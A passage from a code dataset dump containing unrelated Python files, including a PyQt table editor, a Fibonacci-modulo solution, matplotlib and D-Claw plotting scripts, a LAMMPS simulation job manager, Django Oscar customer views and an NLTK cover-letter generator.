range(self.ui.tableWidget.rowCount()):\n            for col in range(self.ui.tableWidget.columnCount()):\n                self.ui.tableWidget.setItem(row, col, QtWidgets.QTableWidgetItem(None))\n            item = QtWidgets.QTableWidgetItem()\n            item.setData(Qt.EditRole, QVariant(row + 1))\n            item.setFlags(Qt.ItemIsEnabled)\n            self.ui.tableWidget.setItem(row, 0, item)\n\n        item = QtWidgets.QTableWidgetItem()\n        self.ui.tableWidget.setHorizontalHeaderItem(0, item)\n        item = self.ui.tableWidget.horizontalHeaderItem(0)\n        item.setText(\"ID\")\n\n        # === AlignCenterText ===\n        delegate = AlignDelegate(self.ui.tableWidget)\n        self.ui.tableWidget.setItemDelegate(delegate)\n        # === AlignCenterText ===\n\n        # Adjust the column widths.\n        self.ui.tableWidget.resizeColumnsToContents()\n\n        self.ui.actionSave.triggered[\"bool\"].connect(self.openFileSaveDialog)\n        self.ui.actionEditItem.triggered[\"bool\"].connect(self.openDialog)\n        self.ui.tableWidget.cellChanged[\"int\", \"int\"].connect(self.get_tableWidget_values)\n\n\n    @pyqtSlot(bool)\n    def openFileSaveDialog(self, q):\n        title = \"Save File\"\n        accept = \"Evaluation Document (*.digna)\"\n        files, _ = QtWidgets.QFileDialog.getSaveFileName(self, title, \"\", accept)\n        print(files, _)\n\n\n    @pyqtSlot(bool)\n    def openDialog(self, q):\n        myDialog = Dialog()\n        myDialog.exec()\n\n\n    @pyqtSlot(int, int)\n    def get_tableWidget_values(self, x, y):\n        self.ui.tableWidget.resizeColumnsToContents()\n        print(x, y)\n        print(self.ui.tableWidget.item(x, y).text())\n\n\nif __name__ == \"__main__\":\n    app = QtWidgets.QApplication(sys.argv)\n    application = main()\n    application.show()\n    sys.exit(app.exec())\n","sub_path":"Digna/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"558340030","text":"# Uses python3\r\n\"\"\"This is the solution for the problem of computing a huge Fibonacci number modulo m.\r\nThe thing here is that we have to solve the problem when n and m are\r\nvery big (n <= 
10^18, m <= 10^5). Thus, the idea of this solution is \r\nto use the Pisano period and its property that each element of\r\nthe period is equal to the sum of the previous two elements modulo m.\"\"\"\r\n\r\nimport sys\r\n\r\n\r\ndef calc_fib(number):\r\n    if number <= 1:\r\n        return number\r\n    else:\r\n        fib_list = []\r\n        fib_list.extend([0, 1])\r\n        for j in range(2, number + 1):\r\n            fib_list.append(fib_list[j - 1] + fib_list[j - 2])\r\n            fib_list[j - 2] = 0\r\n        return fib_list[j]\r\n\r\n\r\ndef get_fibonacci_huge(el_number, divsr_m):\r\n    pis_list = [0, 1]\r\n    for i in range(2, divsr_m ** 2 + 1):\r\n        pis_list.append((pis_list[0] % divsr_m + pis_list[1] % divsr_m) % divsr_m)\r\n        pis_list.pop(0)\r\n        if pis_list == [0, 1]:\r\n            period = i - 1\r\n            break\r\n    answer = calc_fib(el_number % period) % divsr_m\r\n    return answer\r\n\r\n\r\nif __name__ == '__main__':\r\n    input = sys.stdin.read()\r\n    n, m = map(int, input.split())\r\n    print(get_fibonacci_huge(n, m))\r\n","sub_path":"fibonacci_huge_final.py","file_name":"fibonacci_huge_final.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"479611326","text":"import sys\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom pylab import *\n\ntxX = r_[-612.5, -612.5, 612.5, 612.5]-25\ntxY = r_[12.5, -612.5, -612.5, 12.5]-12.5\n\nblk = mpl.patches.Rectangle((-100,-100), 200, 200, color='0.5')\nblk.set_lw(0)\n\nblk2 = mpl.patches.Rectangle((-250,-150), 100, 200, color='0.8')\nblk2.set_lw(0)\n\nblk3 = mpl.patches.Rectangle((-500, 200), 800, 100, color='0.8')\nblk3.set_lw(0)\n\nblk4 = mpl.patches.Rectangle((150,-400), 150, 250, color='0.8')\nblk4.set_lw(0)\n\n\nx, y = meshgrid(r_[-600:600:50], r_[-587.5:587.5:50]-12.5)\nfig1 = plt.figure(figsize=(3.33, 3.33))\nfig1.subplots_adjust(bottom=0.05, top=1.0, left=0.17, right=.93)\nax = fig1.add_subplot(111)\nax.plot(txX, txY, color='k', ls='-', label='Tx Wire')\n\nax.add_patch(blk)\nax.add_patch(blk2)\nax.add_patch(blk3)\nax.add_patch(blk4)\n\nax.set_xlabel(\"Easting (m)\")\nax.set_ylabel(\"Northing (m)\")\nax.plot(x, y, marker='.', color='black', markersize=2, linestyle='None')\nplt.xlim(-900, 900)\nplt.ylim(-900, 900)\nax.set_aspect('equal')\n\nfig1.canvas.draw()\n\nfname = '../figs/gradLayout.eps'\nplt.savefig(fname, format='eps')\nos.system(\"open \" + fname)\n","sub_path":"phdThesisDave/phdThesis/ReducedAppend/figureCode/gradientLayout.py","file_name":"gradientLayout.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"311591043","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport os\n\nsys.path.insert(0, os.path.abspath(\n    os.path.join(os.path.dirname(__file__), '..', \"src\")))\n\nimport python_homie4 as homie  # noqa: E402\n\nmqtt_settings = {\n    \"MQTT_BROKER\": os.getenv(\"mqtt_broker\", \"localhost\"),\n    \"MQTT_PORT\": int(os.getenv(\"mqtt_port\", 1883)),\n}\n\n__all__ = (\n    homie,\n    mqtt_settings,\n)\n","sub_path":"tests/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"529569446","text":"import sqlite3\r\n\r\nwith sqlite3.connect(\"new.db\") as connection:\r\n    c = connection.cursor()\r\n    \r\n    print(\"Original Data:\")\r\n    c.execute(\"SELECT * FROM population\")\r\n    oRows = c.fetchall()\r\n\r\n    for row in oRows:\r\n        print(row)\r\n\r\n    
c.execute(\"UPDATE population SET population = 9000000 \\\n WHERE city = 'New York City'\")\n\n c.execute(\"DELETE FROM population WHERE city = 'Boston'\")\n\n print(\"New Data:\")\n\n c.execute(\"SELECT * FROM population\")\n nRows = c.fetchall()\n\n for row in nRows:\n print(row)\n","sub_path":"sqlg.py","file_name":"sqlg.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"411606206","text":"import os\nfrom lammps import lammps\nimport LammpsTools as lmp\nimport LammpsJobSave as lmpJobSave\nimport lmpWriter as l_writer\nimport config\nimport fifo\nimport misc.time as tm\nimport tempfile as temp\n\nclass Job(object):\n\n def __init__(self, config_path):\n super(Job, self).__init__()\n self.config = self.read_config(config_path)\n \n self.config.sim_path['sim_list'] = os.path.join(self.config.sim_path['root'], 'sim.list')\n open(self.config.sim_path['sim_list'], 'a').close()\n if self.config.sim_parameter['local'] == 1:\n self._switch_to_local()\n else:\n self.config.lmp_path['local_root'] = self.config.lmp_path['root']\n self.config.lmp_path['fifo'] = temp.mkdtemp()\n\n def read_config(self, path):\n return config.JobConfig(path)\n\n def _create_fifos(self):\n fifo = {}\n for name, data in self.config.fifo.items():\n if name == 'distance_fifo':\n fifo[name] = DistanceFifo(self, data['path'], data['script'], data['out'], data['stepsize'])\n elif name == 'traj_compression':\n fifo[name] = TrajCompressionFifo(self, data['path'], data['script'], data['out'], data['stepsize'])\n else:\n raise NotImplementedError('this fifo based postproduction is not yet implemented.')\n return fifo\n\n def setup_env(self):\n self.env = lmp.Environment(self.config.sim_path['config'])\n # Protein\n self.protein_creator = lmp.ProteinCreator(self.env, self.config.sim_path['protein'])\n self.protein = self.protein_creator.create()\n self.protein_creator.change_to_res_based(self.protein)\n # Polymer\n if 'named_sequence' in self.config.sim_parameter:\n self.polymer_creator = lmp.PolymerCreator(self.env, self.config.sim_parameter['named_sequence'], mode='cycle')\n else:\n self.polymer_creator = lmp.PolymerCreator(self.env, \n self.config.sim_parameter['monomers'], weights=self.config.sim_parameter['weights'], \n length=self.config.sim_parameter['poly_length'])\n self.poly = self.polymer_creator.create()\n\n self.sim = lmp.EnvManipulator(self.env, auto_repulsion=False)\n self.sim.create_random_start_positions()\n self.setup_writer = l_writer.LmpWriter(self.env)\n\n # Update Lammps Parameters\n self.config.sim_parameter['named_sequence'] = [particle.type_.name for particle in self.poly.data['particles']]\n self.config.sim_parameter['id_sequence'] = [particle.type_.Id for particle in self.poly.data['particles']]\n as_data = self.sim.activeSiteParticles(self.protein, self.config.sim_path['active_site'])\n self.config.sim_parameter['active_site'] = {'xyz': map(int, as_data['xyz']), \n 'chain': map(str, as_data['chain']), \n 'pdb_id': map(int, as_data['pdb_id']), \n 'iCode': map(str, as_data['iCode'])}\n self.config.lmp_parameter['active_site_ids'] = self.config.sim_parameter['active_site']['xyz']\n self.config.lmp_parameter['monomer_ids'] = self._get_monomer_ids()\n self.config.save()\n # fifos can only be created if the monomer ids are known\n self.fifo = self._create_fifos()\n\n\n def terminate_fifos(self):\n for name, fifo in self.fifo.items():\n fifo.terminate()\n\n def setup_job_save(self):\n self.compactor = 
lmpJobSave.JobSave(self.config.sim_path['root'])\n\n def save(self):\n self.compactor.save()\n self.compactor.save_versions(lmp_version=lammps().version(),\n lmp_tool_hash=lmp.__git_hash__)\n self.compactor._db.close()\n\n def clean_up(self):\n self.compactor.clean_up()\n\n def lmps_run(self, Id, parameters, paths, fifos={}):\n self._start_fifo_capture(Id)\n lammps_sim = lammps()\n # submitting parameters\n for name, val in parameters.items():\n # lists are converted to strings\n if isinstance(val, list):\n val = ' '.join(map(str, val))\n lammps_sim.command('variable %s string \"%s\"'% (name,val))\n # submitting paths\n for name, path in paths.items():\n lammps_sim.command('variable %s string \"%s\"'% (name, path))\n # submitting run Id\n lammps_sim.command('variable num string %05d'% Id)\n # starting script\n lammps_sim.file(paths['script'])\n # specify fifo dumps\n for name,fifo in self.fifo.items():\n lammps_sim.command(fifo.lammps_string())\n lammps_sim.command('run ${time_steps}')\n # write snapshot of end-comformation\n lammps_sim.command('write_dump solid xyz ${end_xyz}.xyz')\n lammps_sim.close()\n # report completed simulation so restarting jobs will know\n # also, it notes the machine and folder, so scattered info can be retrieved\n self._mark_complete(Id)\n\n def generate_new_sim(self, index):\n # Create new Start Conditions\n self.sim.create_random_start_positions()\n # Create New Setup File\n self.setup_writer.write('%s/%05d' % (self.config.lmp_path['input'], index))\n\n def run(self):\n start_idx = self._get_last_uncompleted_index()\n end_idx = self.config.sim_parameter['sampling_rate']\n # check if simulations is already completed\n if start_idx == -1:\n return \n for i in xrange(start_idx, end_idx):\n self.generate_new_sim(i)\n # start next LAMMPS run\n self.lmps_run(i, self.config.lmp_parameter, self.config.lmp_path, fifos=self.fifo)\n # mark job as completed\n if start_idx != -1:\n self._mark_complete(-1)\n self.terminate_fifos()\n\n def create_local_env(self, local_dir='/data/ohl/'):\n '''\n '''\n name_comp = self.config.sim_path['root'].split('/')[-3:]\n if name_comp[1] == 'jobs':\n del name_comp[1]\n else:\n del name_comp[0]\n folder_name = '-'.join(name_comp)\n local_folder = os.path.join(local_dir, folder_name)\n if not os.path.exists(local_folder):\n os.mkdir(local_folder)\n local_input_folder = os.path.join(local_folder, 'input')\n if not os.path.exists(local_input_folder):\n os.mkdir(local_input_folder)\n local_output_folder = os.path.join(local_folder, 'output')\n if not os.path.exists(local_output_folder):\n os.mkdir(local_output_folder)\n local_fifo_folder = os.path.join(local_folder, 'fifo')\n if not os.path.exists(local_fifo_folder):\n os.mkdir(local_fifo_folder)\n new_paths = {'local_root': local_folder,\n 'input': local_input_folder, \n 'output': local_output_folder,\n 'fifo': local_fifo_folder}\n return new_paths\n\n def _get_last_uncompleted_index(self):\n '''get the last line of the sim_list file \n and return the index.\n '''\n with open(self.config.sim_path['sim_list']) as f:\n completed_sims = f.read().split('\\n')\n if len(completed_sims) > 1:\n last_line = completed_sims[-2]\n else:\n return 0\n return int(last_line[:5])\n\n def _switch_to_local(self):\n '''if the data of the simulations \n are to be stored locally, the lmp paths \n are changed accordinly.\n '''\n new_paths = self.create_local_env()\n self.config.lmp_path.update(new_paths)\n\n def _mark_complete(self, index):\n if self.config.sim_parameter['local'] == 1:\n path = 
self.config.lmp_path['local_root']\n else:\n path = self.config.lmp_path['root']\n with open(self.config.sim_path['sim_list'], 'a') as f:\n info = '%05d;%s;%s;%s\\n' % (index, localhost(), path, tm.time_string())\n f.write(info)\n\n def _start_fifo_capture(self, index):\n for name, fifo in self.fifo.items():\n fifo.activate(index)\n\n def _get_monomer_ids(self):\n monomer_ids = set([p.type_.Id for p in self.poly.data['particles']])\n return sorted(monomer_ids) \n\n\nclass TrajCompressionFifo(fifo.FiFo):\n '''This class feeds the output of LAMMPS to \n the python script that calculates the distance between \n the polymer and the active site.\n '''\n def __init__(self, job, fifo_name, script, file_name, steps_size=100):\n self.parent = job\n fifo_path = self.generate_path(fifo_name)\n super(TrajCompressionFifo, self).__init__(fifo_path, script, file_name, steps_size)\n self.args = self.additional_arguments()\n\n def generate_path(self, file_name):\n '''fifo files should reside in the fifo folder.\n '''\n if 'fifo' in self.parent.config.lmp_path:\n fifo_folder = self.parent.config.lmp_path['fifo']\n else:\n fifo_folder = self.create_temp_folder()\n return os.path.join(fifo_folder, file_name)\n\n def additional_arguments(self):\n '''The monomer IDs are needed to be able to discern\n between active site and polymer.\n '''\n return ' '\n\n def output_path(self, index):\n file_name = '%s%05d.xyz.gz' % (self.out_file, index)\n return os.path.join(self.parent.config.lmp_path['output'], file_name)\n\n def lammps_string(self):\n return 'dump fifo_traj solid xyz %d \"%s\"' % (self.step_size, self.fifo_path)\n\n\nclass DistanceFifo(fifo.FiFo):\n '''This class feeds the output of LAMMPS to \n the python script that calculates the distance between \n the polymer and the active site.\n '''\n def __init__(self, job, fifo_name, script, file_name, steps_size=100):\n self.parent = job\n fifo_path = self.generate_path(fifo_name)\n super(DistanceFifo, self).__init__(fifo_path, script, file_name, steps_size)\n self.args = self.additional_arguments()\n\n def generate_path(self, file_name):\n '''fifo files should reside in the fifo folder.\n '''\n if 'fifo' in self.parent.config.lmp_path:\n fifo_folder = self.parent.config.lmp_path['fifo']\n else:\n fifo_folder = self.create_temp_folder()\n return os.path.join(fifo_folder, file_name)\n\n def additional_arguments(self):\n '''The monomer IDs are needed to be able to discern\n between active site and polymer.\n '''\n return '-'.join(map(str, self.parent.config.lmp_parameter['monomer_ids']))\n\n def lammps_string(self):\n return 'dump fifo_distance distance_group xyz %d \"%s\"' % (self.step_size, self.fifo_path)\n\n def output_path(self, index):\n file_name = '%s%05d' % (self.out_file, index)\n return os.path.join(self.parent.config.lmp_path['output'], file_name)\n\ndef localhost():\n return os.uname()[1]\n","sub_path":"Tools/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":11006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"384042131","text":"\n\"\"\"\nSet up the plot figures, axes, and items to be done for each frame.\n\nThis module is imported by the plotting routines and then the\nfunction setplot is called to set the plot parameters.\n\n\"\"\"\n\nfrom pyclaw.geotools import topotools\nfrom pyclaw.data import Data\nimport dclaw.dplot as cd\n#import pdb\n\nfrom pyclaw.plotters import colormaps, geoplot\nfrom numpy import linspace\nimport dclaw.dplot as 
local_dplot\n\n#--------------------------\ndef setplot(plotdata):\n#--------------------------\n\n \"\"\"\n Specify what is to be plotted at each frame.\n Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData.\n Output: a modified version of plotdata.\n\n \"\"\"\n\n\n from pyclaw.plotters import colormaps, geoplot\n from numpy import linspace\n import dclaw.dplot as local_dplot\n\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n\n def fixup(current_data):\n t = current_data.t\n import pylab\n import matplotlib\n import matplotlib.pyplot as pplt\n pylab.title('')\n xticktuple = ('75','80','85','90','95','100','105','110','115','120')\n pylab.xticks(linspace(75,120,10),xticktuple,fontsize=32)\n #pylab.xlabel('Downslope distance from gate (m)',fontsize=32)\n pylab.yticks([],())\n #pylab.yticks([-5,-3,-1,1,3,5,7],('-6','-4','-2','0','2','4','6'),fontsize=18)\n pylab.axis('equal')\n #pylab.grid()\n #a = pplt.gca()\n #cgrid = a.grid\n #cgrid(which='major',axis='x',linewidth=0.25,color='0.75')\n #print lines\n #pdb.set_trace()\n #pplt.getp()\n pplt.gcf().subplots_adjust(left=0.0,bottom=0.15,right=1.0,top=1.0,wspace = 0.0,hspace=0.0)\n #pylab.tight_layout(0.0,0.0)\n pylab.xlim(74,122)\n pylab.ylim(-4.0,6.0)\n\n\n figkwargs = dict(figsize=(48*.3,11*.3/.85),dpi=1600)\n #-----------------------------------------\n # Figure for pcolor plot\n #-----------------------------------------\n plotfigure = plotdata.new_plotfigure(name='pcolor', figno=0)\n plotfigure.show = True\n plotfigure.kwargs = figkwargs\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes('pcolor')\n plotaxes.afteraxes = fixup\n plotaxes.title = ''\n\n\n # Debris\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.depth\n plotitem.pcolor_cmap = local_dplot.flume_colormap\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 0.18\n plotitem.add_colorbar = False\n plotitem.amr_gridlines_show = [0,0,0,0,0]\n plotitem.gridedges_show = 0\n\n\n # Land\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = local_dplot.land\n plotitem.pcolor_cmap = local_dplot.runoutpad_colormap\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 0.1\n plotitem.add_colorbar = False\n plotitem.amr_gridlines_show = [1,1,0,0,0]\n plotitem.kwargs = {'linewidths':0.001}\n plotitem.gridedges_show = 0\n\n\n # add contour lines of depth if desired\n plotitem = plotaxes.new_plotitem(plot_type='2d_contour')\n plotitem.show = True\n plotitem.plot_var = geoplot.depth\n plotitem.contour_levels = linspace(0.0,0.18,10)\n plotitem.amr_contour_colors = ['k'] # color on each level\n plotitem.kwargs = {'linestyles':'solid','linewidths':1}\n plotitem.amr_contour_show = [0,0,1,1,0]\n #plotitem.gridlines_show = [1,1,0,0,0,0]\n #plotitem.gridedges_show = 0\n\n\n #-----------------------------------------\n\n # Parameters used only when creating html and/or latex hardcopy\n # e.g., via pyclaw.plotters.frametools.printframes:\n\n plotdata.printfigs = True # print figures\n plotdata.print_format = 'png' # file format\n plotdata.print_framenos = 'all' # range(70,190,10) # list of frames to print\n plotdata.print_gaugenos = 'all' # list of gauges to print\n plotdata.print_fignos = 'all' # list of figures to print\n plotdata.html = True # create html files of plots?\n plotdata.html_homelink = '../README.html' # pointer for top of index\n plotdata.latex = True # create latex file of plots?\n plotdata.latex_figsperline = 2 # layout of plots\n plotdata.latex_framesperline = 1 # 
layout of plots\n plotdata.latex_makepdf = False # also run pdflatex?\n\n return plotdata\n\n","sub_path":"USGSFlume/gate_release_example/setplot.py","file_name":"setplot.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"518471149","text":"import urlparse\n\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth import authenticate, login as auth_login\nfrom django.contrib.sites.models import get_current_site\nfrom django.conf import settings\nfrom django.db.models import get_model\n\nfrom oscar.apps.address.forms import UserAddressForm\nfrom oscar.views.generic import PostActionMixin\nfrom oscar.apps.customer.forms import EmailAuthenticationForm, EmailUserCreationForm\nfrom oscar.core.loading import import_module\nimport_module('customer.utils', ['Dispatcher'], locals())\n\norder_model = get_model('order', 'Order')\norder_line_model = get_model('order', 'Line')\nbasket_model = get_model('basket', 'Basket')\nuser_address_model = get_model('address', 'UserAddress')\nemail_model = get_model('customer', 'email')\ncommunicationtype_model = get_model('customer', 'communicationeventtype')\n\n\nclass AccountSummaryView(ListView):\n \"\"\"Customer order history\"\"\"\n context_object_name = \"orders\"\n template_name = 'customer/profile.html'\n paginate_by = 20\n model = order_model\n\n def get_queryset(self):\n \"\"\"Return a customer's orders\"\"\"\n return self.model._default_manager.filter(user=self.request.user)[0:5]\n \n \nclass AccountAuthView(TemplateView):\n template_name = 'customer/login_registration.html'\n redirect_field_name = 'next'\n login_prefix = 'login'\n registration_prefix = 'registration'\n communication_type_code = 'REGISTRATION'\n \n def get_logged_in_redirect(self):\n return reverse('customer:summary')\n \n def get_context_data(self, *args, **kwargs):\n context = super(AccountAuthView, self).get_context_data(*args, **kwargs)\n redirect_to = self.request.REQUEST.get(self.redirect_field_name, '')\n context[self.redirect_field_name] = redirect_to\n context['login_form'] = EmailAuthenticationForm(prefix=self.login_prefix)\n context['registration_form'] = EmailUserCreationForm(prefix=self.registration_prefix) \n return context\n \n def check_redirect(self, context):\n redirect_to = context.get(self.redirect_field_name)\n \n netloc = urlparse.urlparse(redirect_to)[1]\n if not redirect_to:\n redirect_to = settings.LOGIN_REDIRECT_URL\n elif netloc and netloc != self.request.get_host():\n redirect_to = settings.LOGIN_REDIRECT_URL\n return redirect_to\n \n def send_registration_email(self, user):\n code = self.communication_type_code\n ctx = {'user': user,\n 'site': get_current_site(self.request)}\n try:\n event_type = communicationtype_model.objects.get(code=code)\n except communicationtype_model.DoesNotExist:\n # No event in database, attempt to find templates for this type\n messages = communicationtype_model.objects.get_and_render(code, ctx)\n else:\n # Create order event\n messages = event_type.get_messages(ctx)\n\n if messages and messages['body']: \n dispatcher = Dispatcher()\n dispatcher.dispatch_user_messages(user, messages)\n \n def get(self, request, *args, **kwargs):\n 
context = self.get_context_data(*args, **kwargs)\n \n if request.user.is_authenticated():\n return HttpResponseRedirect(self.get_logged_in_redirect())\n\n self.request.session.set_test_cookie()\n return self.render_to_response(context)\n \n def post(self, request, *args, **kwargs):\n context = self.get_context_data(*args, **kwargs)\n redirect_to = self.check_redirect(context)\n \n if u'login_submit' in self.request.POST:\n login_form = EmailAuthenticationForm(prefix=self.login_prefix, data=request.POST) \n if login_form.is_valid():\n auth_login(request, login_form.get_user())\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n return HttpResponseRedirect(redirect_to)\n context['login_form'] = login_form\n\n if u'registration_submit' in self.request.POST:\n registration_form = EmailUserCreationForm(prefix=self.registration_prefix, data=request.POST)\n context['registration_form'] = registration_form\n if registration_form.is_valid():\n user = registration_form.save()\n \n if getattr(settings, 'OSCAR_SEND_REGISTRATION_EMAIL', True):\n self.send_registration_email(user)\n \n user = authenticate(username=user.email, password=registration_form.cleaned_data['password1'])\n auth_login(self.request, user)\n if self.request.session.test_cookie_worked():\n self.request.session.delete_test_cookie() \n return HttpResponseRedirect(redirect_to)\n \n self.request.session.set_test_cookie()\n return self.render_to_response(context)\n\n \nclass EmailHistoryView(ListView):\n \"\"\"Customer email history\"\"\"\n context_object_name = \"emails\"\n template_name = 'customer/email-history.html'\n paginate_by = 20\n\n def get_queryset(self):\n \"\"\"Return a customer's orders\"\"\"\n return email_model._default_manager.filter(user=self.request.user)\n\n\nclass EmailDetailView(DetailView):\n \"\"\"Customer order details\"\"\"\n template_name = \"customer/email.html\"\n context_object_name = 'email'\n \n def get_object(self):\n \"\"\"Return an order object or 404\"\"\"\n return get_object_or_404(email_model, user=self.request.user, id=self.kwargs['email_id'])\n\n\nclass OrderHistoryView(ListView):\n \"\"\"Customer order history\"\"\"\n context_object_name = \"orders\"\n template_name = 'customer/order-history.html'\n paginate_by = 20\n model = order_model\n\n def get_queryset(self):\n \"\"\"Return a customer's orders\"\"\"\n return self.model._default_manager.filter(user=self.request.user)\n\n\nclass OrderDetailView(DetailView):\n \"\"\"Customer order details\"\"\"\n model = order_model\n \n def get_template_names(self):\n return [\"customer/order.html\"] \n\n def get_object(self):\n return get_object_or_404(self.model, user=self.request.user, number=self.kwargs['order_number'])\n\n\nclass OrderLineView(DetailView, PostActionMixin):\n \"\"\"Customer order line\"\"\"\n \n def get_object(self):\n \"\"\"Return an order object or 404\"\"\"\n order = get_object_or_404(order_model, user=self.request.user, number=self.kwargs['order_number'])\n return order.lines.get(id=self.kwargs['line_id'])\n \n def do_reorder(self, line):\n if not line.product:\n messages.info(self.request, _(\"This product is no longer available for re-order\"))\n return\n \n # We need to pass response to the get_or_create... 
method\n # as a new basket might need to be created\n self.response = HttpResponseRedirect(reverse('basket:summary'))\n basket = self.request.basket\n \n # Convert line attributes into basket options\n options = []\n for attribute in line.attributes.all():\n if attribute.option:\n options.append({'option': attribute.option, 'value': attribute.value})\n basket.add_product(line.product, 1, options)\n messages.info(self.request, \"Line reordered\") \n\n\nclass AddressListView(ListView):\n \"\"\"Customer address book\"\"\"\n context_object_name = \"addresses\"\n template_name = 'customer/address-book.html'\n paginate_by = 40\n \n def get_queryset(self):\n \"\"\"Return a customer's addresses\"\"\"\n return user_address_model._default_manager.filter(user=self.request.user)\n\n\nclass AddressCreateView(CreateView):\n form_class = UserAddressForm\n mode = user_address_model\n \n def form_valid(self, form):\n self.object = form.save(commit=False)\n self.object.user = self.request.user\n self.object.save()\n return HttpResponseRedirect(self.get_success_url())\n\n def get_template_names(self):\n return [\"customer/address-create.html\"]\n\n def get_success_url(self):\n return reverse('customer:address-list')\n\n\nclass AddressUpdateView(UpdateView):\n form_class = UserAddressForm\n model = user_address_model\n \n def get_queryset(self):\n \"\"\"Return a customer's addresses\"\"\"\n return user_address_model._default_manager.filter(user=self.request.user) \n\n def get_template_names(self):\n return [\"customer/address-form.html\"]\n \n def get_success_url(self):\n return reverse('customer:address-detail', kwargs={'pk': self.get_object().pk })\n\n\nclass AddressDeleteView(DeleteView):\n model = user_address_model\n\n def get_queryset(self):\n \"\"\"Return a customer's addresses\"\"\"\n return user_address_model._default_manager.filter(user=self.request.user) \n\n def get_success_url(self):\n return reverse('customer:address-list') \n \n def get_template_names(self):\n return [\"customer/address-delete.html\"]\n","sub_path":"oscar/apps/customer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"626925843","text":"import nltk\nimport os\nimport string\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import stopwords, state_union\nfrom nltk.stem import PorterStemmer\nfrom nltk.probability import FreqDist\n\n#get input text \ndirpath = os.getcwd() + \"/Job Summary.txt\"\ndata = state_union.raw(dirpath)\n\n#initialize utilities\nlemma = nltk.wordnet.WordNetLemmatizer()\nps=PorterStemmer()\nstop_words = set(stopwords.words(\"english\"))\nmystop_words=[\"\\'ll\",\"position\",\"work\",\"job\",\"role\",\"year\",\"valley\",\"skill\",\"day\",\"summary\",\"must\",\"salary\",'ready','great','enriched','include','top','position','500','fortune','large','set','include','reasonable','providing','decent','like','using','along',]\njobDesStopWords=stop_words.union(mystop_words)\n\nweighedKeyWords = {'python':10}\ntemplate={'experience':[\"I worked at SAP for almost 3 years. 
While working there, I worked with fortune 500 companies like Coca-cola as a development support engineer by helping them with customization and consulting issues.\"],\n\t\t\t'data':[\"In my academic years, I completed many projects involving data cleansing, plotting, simulation and extrapolation using Matlab and Python.\",\n\t\t\t\"I obtained my certificate offered by Microsoft in \\\"Programming with Python for Data Science\\\" where I practiced with real datasets and real problems and achieved 91% upon obtaining the certificate.\"],\n\t\t\t'analytic':[\"I also applied data analysis to the sales data of a local business I owned and came up with new promotion based on the model. This new strategy has led to a 30% increment in the monthly revenue.\"],\n\t\t\t'degree':[\"I graduated from Queen's University in Canada with a degree of Specialization in Biomedical Computing.\"]}\n\n#tokenize into sentences and then words\nsents = sent_tokenize(data)\nwords = []\nfor s in sents:\n\twords += word_tokenize(s)\n\n#filter words \nfiltered_words = []\nwords = [w.lower() for w in words]\nfor w in words:\n\tw = lemma.lemmatize(w);\n\tif w not in string.punctuation and w not in jobDesStopWords:\n\t\tfiltered_words.append(w)\n#print (unlemmatized)\n#print(filtered_words)\n\nfdist = FreqDist(filtered_words)\ntop_200 = fdist.most_common(200)\n\n\n'''\nprint(top_200)\ntest=['abc','bcd'];\ntest.extend(['efg']*10);\nprint(test)\n'''\nname=input('What is your name? ')\njobPosition=input('What is your job position? ')\ncompanyName=input('What is the company\\'s name? ')\nnumbered_Top200 = []\nfor i in range(0,len(top_200)):\n\tnumberedkword=str(i+1)+\" \"+str(top_200[i][0])\n\tprint(numberedkword)\n\t#numbered_Top200.append(str(i+1)+\". \"+str(top_200[i][0]))\n#print(numbered_Top200);\nkeywords=input('Please select the corresponding number for each word, separated by commas with no spaces. ');\nkeywords=keywords.split(',');\ntextbody=\"\";\nfor s in keywords:\n\tkeyword=top_200[int(s)-1][0]\n\tif keyword in template:\n\t\ttextbody=textbody+(template[keyword][0])+\" \"\n\telse:\n\t\tprint(\"keyword {0} is not in template, please fix your template\".format(keyword));\n\ncoverletter=(\"Dear Recruiting Manager, \\nMy name is \" +name+\", I am writing this letter to express my interest in the \"+jobPosition+\" position available at \"+companyName+\n\t \". As I thoroughly read through the job description, I feel that with my knowledge and experience, I will be an excellent candidate for this position.\\n\"+ textbody +\n\t\t\"\\nI am a person who likes to be challenged and to be given responsibility. It would be my pleasure to grow together with the company. With all my unique \"+\n\t\t\"experience and technical backgrounds, I believe I am a great candidate for this \"+jobPosition+\" position. 
